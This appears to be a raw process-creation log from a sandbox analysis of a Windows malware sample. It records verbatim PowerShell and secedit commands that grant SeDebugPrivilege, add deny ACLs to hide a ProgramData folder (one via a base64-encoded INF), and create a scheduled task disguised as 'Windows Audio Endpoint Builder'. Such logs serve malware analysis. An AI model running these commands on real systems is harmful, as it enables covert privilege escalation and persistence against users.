Source: C:\Users\Public\Documents\UfHE8OB\MTGHu7b.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell.exe -NoProfile -C "[IO.File]::WriteAllBytes([IO.Path]::Combine($env:TEMP, 'SeDebugPrivilege4.inf'), [Convert]::FromBase64String('//5bAFUAbgBpAGMAbwBkAGUAXQANAAoAVQBuAGkAYwBvAGQAZQA9AHkAZQBzAA0ACgBbAFYAZQByAHMAaQBvAG4AXQANAAoAcwBpAGcAbgBhAHQAdQByAGUAPQAiACQAQwBIAEkAQwBBAEcATwAkACIADQAKAFIAZQB2AGkAcwBpAG8AbgA9ADEADQAKAFsAUAByAGkAdgBpAGwAZQBnAGUAIABSAGkAZwBoAHQAcwBdAA0ACgBTAGUARABlAGIAdQBnAFAAcgBpAHYAaQBsAGUAZwBlACAAPQAgACoAUwAtADEALQA1AC0AMQA4AA0ACgA=')); secedit.exe /configure /db ([IO.Path]::Combine($env:TEMP, 'SeDebugPrivilege4.sdb')) /cfg ([IO.Path]::Combine($env:TEMP, 'SeDebugPrivilege4.inf')) /overwrite /log ([IO.Path]::Combine($env:TEMP, 'SeDebugPrivilege4.log')) /quiet; Remove-Item -Path ([IO.Path]::Combine($env:TEMP, 'SeDebugPrivilege4.*')) -Force;"
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\Public\Documents\UfHE8OB\MTGHu7b.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell.exe -NoProfile -C "Set-Content -Value @('[Unicode]','Unicode=yes','[Version]','signature=\"$CHICAGO$\"','Revision=1','[Privilege Rights]','SeDebugPrivilege = S-1-5-18','[File Security]','\"C:\ProgramData\Program\",0,\"D:AR(D;OICI;DTSDRCWD;;;WD)\"') -Path ([IO.Path]::Combine($env:TEMP, 'SeDebugPrivilege1.inf')) -Encoding Unicode; secedit.exe /configure /db ([IO.Path]::Combine($env:TEMP, 'SeDebugPrivilege1.sdb')) /cfg ([IO.Path]::Combine($env:TEMP, 'SeDebugPrivilege1.inf')) /overwrite /log ([IO.Path]::Combine($env:TEMP, 'SeDebugPrivilege1.log')) /quiet; Remove-Item -Path ([IO.Path]::Combine($env:TEMP, 'SeDebugPrivilege1.')) -Force;"
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\Public\Documents\UfHE8OB\MTGHu7b.exe	Process created: C:\Windows\SysWOW64\cmd.exe cmd /c echo.>c:\inst.ini
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\SysWOW64\SecEdit.exe "C:\Windows\system32\SecEdit.exe" /configure /db C:\Users\user\AppData\Local\Temp\SeDebugPrivilege4.sdb /cfg C:\Users\user\AppData\Local\Temp\SeDebugPrivilege4.inf /overwrite /log C:\Users\user\AppData\Local\Temp\SeDebugPrivilege4.log /quiet
Source: unknown	Process created: C:\ProgramData\Program\iusb3mon.exe C:\ProgramData\program\iusb3mon.exe
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\SysWOW64\SecEdit.exe "C:\Windows\system32\SecEdit.exe" /configure /db C:\Users\user\AppData\Local\Temp\SeDebugPrivilege1.sdb /cfg C:\Users\user\AppData\Local\Temp\SeDebugPrivilege1.inf /overwrite /log C:\Users\user\AppData\Local\Temp\SeDebugPrivilege1.log /quiet
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\SysWOW64\SecEdit.exe "C:\Windows\system32\SecEdit.exe" /configure /db C:\Users\user\AppData\Local\Temp\SeDebugPrivilege3.sdb /cfg C:\Users\user\AppData\Local\Temp\SeDebugPrivilege3.inf /overwrite /log C:\Users\user\AppData\Local\Temp\SeDebugPrivilege3.log /quiet
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\SysWOW64\SecEdit.exe "C:\Windows\system32\SecEdit.exe" /configure /db C:\Users\user\AppData\Local\Temp\SeDebugPrivilege1.sdb /cfg C:\Users\user\AppData\Local\Temp\SeDebugPrivilege1.inf /overwrite /log C:\Users\user\AppData\Local\Temp\SeDebugPrivilege1.log /quiet
Source: unknown	Process created: C:\Windows\System32\svchost.exe C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS
Source: C:\Users\Public\Documents\UfHE8OB\MTGHu7b.exe	Process created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c schtasks.exe /create /tn "Windows Audio Endpoint Builder( )" /xml "C:\ProgramData\Microsoft\MicrosoftNetFramework.xml
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\schtasks.exe schtasks.exe /create /tn "Windows Audio Endpoint Builder( )" /xml "C:\ProgramData\Microsoft\MicrosoftNetFramework.xml
Source: C:\Users\user\AppData\Local\Temp\_ir_sf_temp_0\irsetup.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Get-Process ([IO.Path]::GetFileNameWithoutExtension(\"MTGHu7b.exe\"));
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\AppData\Local\Temp\_ir_sf_temp_0\irsetup.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Get-Process ([IO.Path]::GetFileNameWithoutExtension(\"MTGHu7b.exe\"));
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\ProgramData\Program\iusb3mon.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell.exe -NoProfile -C "Set-Content -Value @('[Unicode]','Unicode=yes','[Version]','signature=\"$CHICAGO$\"','Revision=1','[Privilege Rights]','SeDebugPrivilege = S-1-5-18','[File Security]','\"C:\ProgramData\Program\",0,\"D:AR(D;OICI;DTSDRCWD;;;WD)\"') -Path ([IO.Path]::Combine($env:TEMP, 'SeDebugPrivilege1.inf')) -Encoding Unicode; secedit.exe /configure /db ([IO.Path]::Combine($env:TEMP, 'SeDebugPrivilege1.sdb')) /cfg ([IO.Path]::Combine($env:TEMP, 'SeDebugPrivilege1.inf')) /overwrite /log ([IO.Path]::Combine($env:TEMP, 'SeDebugPrivilege1.log')) /quiet; Remove-Item -Path ([IO.Path]::Combine($env:TEMP, 'SeDebugPrivilege1.')) -Force;"
Source: C:\ProgramData\Program\iusb3mon.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell.exe -NoProfile -C "Set-Content -Value @('[Unicode]','Unicode=yes','[Version]','signature=\"$CHICAGO$\"','Revision=1','[Privilege Rights]','SeDebugPrivilege = S-1-5-18','[File Security]','\"C:\ProgramData\Data\",0,\"D:AR(D;OICI;DTSDRCWD;;;WD)\"') -Path ([IO.Path]::Combine($env:TEMP, 'SeDebugPrivilege3.inf')) -Encoding Unicode; secedit.exe /configure /db ([IO.Path]::Combine($env:TEMP, 'SeDebugPrivilege3.sdb')) /cfg ([IO.Path]::Combine($env:TEMP, 'SeDebugPrivilege3.inf')) /overwrite /log ([IO.Path]::Combine($env:TEMP, 'SeDebugPrivilege3.log')) /quiet; Remove-Item -Path ([IO.Path]::Combine($env:TEMP, 'SeDebugPrivilege3.')) -Force;"
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\ProgramData\Program\iusb3mon.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell.exe -NoProfile -C "[IO.File]::WriteAllBytes([IO.Path]::Combine($env:TEMP, 'SeDebugPrivilege4.inf'), [Convert]::FromBase64String('//5bAFUAbgBpAGMAbwBkAGUAXQANAAoAVQBuAGkAYwBvAGQAZQA9AHkAZQBzAA0ACgBbAFYAZQByAHMAaQBvAG4AXQANAAoAcwBpAGcAbgBhAHQAdQByAGUAPQAiACQAQwBIAEkAQwBBAEcATwAkACIADQAKAFIAZQB2AGkAcwBpAG8AbgA9ADEADQAKAFsAUAByAGkAdgBpAGwAZQBnAGUAIABSAGkAZwBoAHQAcwBdAA0ACgBTAGUARABlAGIAdQBnAFAAcgBpAHYAaQBsAGUAZwBlACAAPQAgACoAUwAtADEALQA1AC0AMQA4AA0ACgA=')); secedit.exe /configure /db ([IO.Path]::Combine($env:TEMP, 'SeDebugPrivilege4.sdb')) /cfg ([IO.Path]::Combine($env:TEMP, 'SeDebugPrivilege4.inf')) /overwrite /log ([IO.Path]::Combine($env:TEMP, 'SeDebugPrivilege4.log')) /quiet; Remove-Item -Path ([IO.Path]::Combine($env:TEMP, 'SeDebugPrivilege4.*')) -Force;"
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\AppData\Local\Temp\_ir_sf_temp_0\irsetup.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Get-Process ([IO.Path]::GetFileNameWithoutExtension(\"MTGHu7b.exe\"));
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\SysWOW64\SecEdit.exe "C:\Windows\system32\SecEdit.exe" /configure /db C:\Users\user\AppData\Local\Temp\SeDebugPrivilege4.sdb /cfg C:\Users\user\AppData\Local\Temp\SeDebugPrivilege4.inf /overwrite /log C:\Users\user\AppData\Local\Temp\SeDebugPrivilege4.log /quiet
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\SysWOW64\SecEdit.exe "C:\Windows\system32\SecEdit.exe" /configure /db C:\Users\user\AppData\Local\Temp\SeDebugPrivilege1.sdb /cfg C:\Users\user\AppData\Local\Temp\SeDebugPrivilege1.inf /overwrite /log C:\Users\user\AppData\Local\Temp\SeDebugPrivilege1.log /quiet
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\SysWOW64\SecEdit.exe "C:\Windows\system32\SecEdit.exe" /configure /db C:\Users\user\AppData\Local\Temp\SeDebugPrivilege3.sdb /cfg C:\Users\user\AppData\Local\Temp\SeDebugPrivilege3.inf /overwrite /log C:\Users\user\AppData\Local\Temp\SeDebugPrivilege3.log /quiet
Source: C:\ProgramData\Program\iusb3mon.exe	Process created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c schtasks.exe /create /tn "Windows Audio Endpoint Builder( )" /xml "C:\ProgramData\Microsoft\MicrosoftNetFramework.xml
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\schtasks.exe schtasks.exe /create /tn "Windows Audio Endpoint Builder( )" /xml "C:\ProgramData\Microsoft\MicrosoftNetFramework.xml
Source: C:\Users\user\AppData\Local\Temp\_ir_sf_temp_0\irsetup.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Get-Process ([IO.Path]::GetFileNameWithoutExtension(\"MTGHu7b.exe\"));
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\ProgramData\Program\iusb3mon.exe	Process created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c schtasks.exe /create /tn "Windows Audio Endpoint Builder( )" /xml "C:\ProgramData\Microsoft\MicrosoftNetFramework.xml
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\schtasks.exe schtasks.exe /create /tn "Windows Audio Endpoint Builder( )" /xml "C:\ProgramData\Microsoft\MicrosoftNetFramework.xml
Source: C:\Users\user\AppData\Local\Temp\_ir_sf_temp_0\irsetup.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Get-Process ([IO.Path]::GetFileNameWithoutExtension(\"MTGHu7b.exe\"));
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\ProgramData\Program\iusb3mon.exe	Process created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c schtasks.exe /create /tn "Windows Audio Endpoint Builder( )" /xml "C:\ProgramData\Microsoft\MicrosoftNetFramework.xml
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\AppData\Local\Temp\_ir_sf_temp_0\irsetup.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Get-Process ([IO.Path]::GetFileNameWithoutExtension(\"MTGHu7b.exe\"));
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\schtasks.exe schtasks.exe /create /tn "Windows Audio Endpoint Builder( )" /xml "C:\ProgramData\Microsoft\MicrosoftNetFramework.xml
Source: C:\Users\user\AppData\Local\Temp\_ir_sf_temp_0\irsetup.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Get-Process ([IO.Path]::GetFileNameWithoutExtension(\"MTGHu7b.exe\"));
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\ProgramData\Program\iusb3mon.exe	Process created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c schtasks.exe /create /tn "Windows Audio Endpoint Builder( )" /xml "C:\ProgramData\Microsoft\MicrosoftNetFramework.xml
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\schtasks.exe schtasks.exe /create /tn "Windows Audio Endpoint Builder( )" /xml "C:\ProgramData\Microsoft\MicrosoftNetFramework.xml
Source: C:\Users\user\AppData\Local\Temp\_ir_sf_temp_0\irsetup.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Get-Process ([IO.Path]::GetFileNameWithoutExtension(\"MTGHu7b.exe\"));
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\ProgramData\Program\iusb3mon.exe	Process created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c schtasks.exe /create /tn "Windows Audio Endpoint Builder( )" /xml "C:\ProgramData\Microsoft\MicrosoftNetFramework.xml
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\schtasks.exe schtasks.exe /create /tn "Windows Audio Endpoint Builder( )" /xml "C:\ProgramData\Microsoft\MicrosoftNetFramework.xml
Source: C:\Users\user\AppData\Local\Temp\_ir_sf_temp_0\irsetup.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Get-Process ([IO.Path]::GetFileNameWithoutExtension(\"MTGHu7b.exe\"));
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\ProgramData\Program\iusb3mon.exe	Process created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c schtasks.exe /create /tn "Windows Audio Endpoint Builder( )" /xml "C:\ProgramData\Microsoft\MicrosoftNetFramework.xml
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\schtasks.exe schtasks.exe /create /tn "Windows Audio Endpoint Builder( )" /xml "C:\ProgramData\Microsoft\MicrosoftNetFramework.xml
Source: C:\Users\user\AppData\Local\Temp\_ir_sf_temp_0\irsetup.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Get-Process ([IO.Path]::GetFileNameWithoutExtension(\"MTGHu7b.exe\"));
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\ProgramData\Program\iusb3mon.exe	Process created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c schtasks.exe /create /tn "Windows Audio Endpoint Builder( )" /xml "C:\ProgramData\Microsoft\MicrosoftNetFramework.xml
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\schtasks.exe schtasks.exe /create /tn "Windows Audio Endpoint Builder( )" /xml "C:\ProgramData\Microsoft\MicrosoftNetFramework.xml
Source: C:\Users\user\AppData\Local\Temp\_ir_sf_temp_0\irsetup.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Get-Process ([IO.Path]::GetFileNameWithoutExtension(\"MTGHu7b.exe\"));
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\ProgramData\Program\iusb3mon.exe	Process created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c schtasks.exe /create /tn "Windows Audio Endpoint Builder( )" /xml "C:\ProgramData\Microsoft\MicrosoftNetFramework.xml
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\schtasks.exe schtasks.exe /create /tn "Windows Audio Endpoint Builder( )" /xml "C:\ProgramData\Microsoft\MicrosoftNetFramework.xml
Source: C:\Users\user\AppData\Local\Temp\_ir_sf_temp_0\irsetup.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Get-Process ([IO.Path]::GetFileNameWithoutExtension(\"MTGHu7b.exe\"));
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\AppData\Local\Temp\_ir_sf_temp_0\irsetup.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Get-Process ([IO.Path]::GetFileNameWithoutExtension(\"MTGHu7b.exe\"));
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\AppData\Local\Temp\_ir_sf_temp_0\irsetup.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Get-Process ([IO.Path]::GetFileNameWithoutExtension(\"MTGHu7b.exe\"));
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\ProgramData\Program\iusb3mon.exe	Process created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c schtasks.exe /create /tn "Windows Audio Endpoint Builder( )" /xml "C:\ProgramData\Microsoft\MicrosoftNetFramework.xml
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\ProgramData\Program\iusb3mon.exe	Process created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c schtasks.exe /create /tn "Windows Audio Endpoint Builder( )" /xml "C:\ProgramData\Microsoft\MicrosoftNetFramework.xml
Source: C:\Users\user\AppData\Local\Temp\_ir_sf_temp_0\irsetup.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Get-Process ([IO.Path]::GetFileNameWithoutExtension(\"MTGHu7b.exe\"));
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\AppData\Local\Temp\_ir_sf_temp_0\irsetup.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Get-Process ([IO.Path]::GetFileNameWithoutExtension(\"MTGHu7b.exe\"));
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\ProgramData\Program\iusb3mon.exe	Process created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c schtasks.exe /create /tn "Windows Audio Endpoint Builder( )" /xml "C:\ProgramData\Microsoft\MicrosoftNetFramework.xml
Source: C:\Users\user\AppData\Local\Temp\_ir_sf_temp_0\irsetup.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Get-Process ([IO.Path]::GetFileNameWithoutExtension(\"MTGHu7b.exe\"));
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\ProgramData\Program\iusb3mon.exe	Process created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c schtasks.exe /create /tn "Windows Audio Endpoint Builder( )" /xml "C:\ProgramData\Microsoft\MicrosoftNetFramework.xml
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\AppData\Local\Temp\_ir_sf_temp_0\irsetup.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Get-Process ([IO.Path]::GetFileNameWithoutExtension(\"MTGHu7b.exe\"));
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\ProgramData\Program\iusb3mon.exe	Process created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c schtasks.exe /create /tn "Windows Audio Endpoint Builder( )" /xml "C:\ProgramData\Microsoft\MicrosoftNetFramework.xml
Source: C:\Users\user\AppData\Local\Temp\_ir_sf_temp_0\irsetup.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Get-Process ([IO.Path]::GetFileNameWithoutExtension(\"MTGHu7b.exe\"));
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\ProgramData\Program\iusb3mon.exe	Process created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c schtasks.exe /create /tn "Windows Audio Endpoint Builder( )" /xml "C:\ProgramData\Microsoft\MicrosoftNetFramework.xml
Source: C:\Users\user\AppData\Local\Temp\_ir_sf_temp_0\irsetup.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Get-Process ([IO.Path]::GetFileNameWithoutExtension(\"MTGHu7b.exe\"));
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\AppData\Local\Temp\_ir_sf_temp_0\irsetup.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Get-Process ([IO.Path]::GetFileNameWithoutExtension(\"MTGHu7b.exe\"));
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\ProgramData\Program\iusb3mon.exe	Process created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c schtasks.exe /create /tn "Windows Audio Endpoint Builder( )" /xml "C:\ProgramData\Microsoft\MicrosoftNetFramework.xml
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\schtasks.exe schtasks.exe /create /tn "Windows Audio Endpoint Builder( )" /xml "C:\ProgramData\Microsoft\MicrosoftNetFramework.xml
Source: C:\ProgramData\Program\iusb3mon.exe	Process created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c schtasks.exe /create /tn "Windows Audio Endpoint Builder( )" /xml "C:\ProgramData\Microsoft\MicrosoftNetFramework.xml
Source: C:\Users\user\AppData\Local\Temp\_ir_sf_temp_0\irsetup.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Get-Process ([IO.Path]::GetFileNameWithoutExtension(\"MTGHu7b.exe\"));
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\AppData\Local\Temp\_ir_sf_temp_0\irsetup.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Get-Process ([IO.Path]::GetFileNameWithoutExtension(\"MTGHu7b.exe\"));
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\ProgramData\Program\iusb3mon.exe	Process created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c schtasks.exe /create /tn "Windows Audio Endpoint Builder( )" /xml "C:\ProgramData\Microsoft\MicrosoftNetFramework.xml
